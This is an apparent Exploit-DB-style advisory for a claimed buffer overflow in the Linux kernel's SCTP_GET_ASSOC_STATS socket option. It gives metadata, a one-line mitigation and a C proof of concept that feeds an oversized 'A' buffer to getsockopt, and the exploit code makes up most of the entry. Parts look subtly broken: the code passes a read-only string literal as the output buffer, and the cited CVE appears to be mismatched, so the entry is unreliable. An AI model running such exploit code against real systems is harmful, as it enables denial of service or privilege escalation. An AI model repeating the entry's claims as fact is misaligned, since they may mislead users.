Vendor: Linux Kernel
By: Jann Horn
CVSS: 6.5 (MEDIUM)
CWE: 120 (Buffer Overflow)
Product Name: Linux Kernel
Affected Version From: Linux kernel version 5.6.1
Affected Version To: Linux kernel version 5.6.7
Patch Exists: YES
Related CVE: CVE-2020-10760
CPE: o:linux:linux_kernel
Platforms Tested: Linux
Year: 2020

SCTP GET_ASSOC_STATS Buffer Overflow

A buffer overflow vulnerability exists in the Linux kernel's handling of the SCTP_GET_ASSOC_STATS socket option. A local user can send a specially crafted SCTP_GET_ASSOC_STATS socket option request to the kernel, which can overflow a buffer and lead to privilege escalation or denial of service.

Mitigation:

Upgrade to the latest version of the Linux kernel

Exploit-DB raw data:

#include <stdio.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define SCTP_GET_ASSOC_STATS 112
#define SOL_SCTP 132

int main(void)
{
	char *buf = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
	socklen_t len = strlen(buf);
	int fd;

	fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
	getsockopt(fd, SOL_SCTP, SCTP_GET_ASSOC_STATS, buf, &len);
	return 0;
}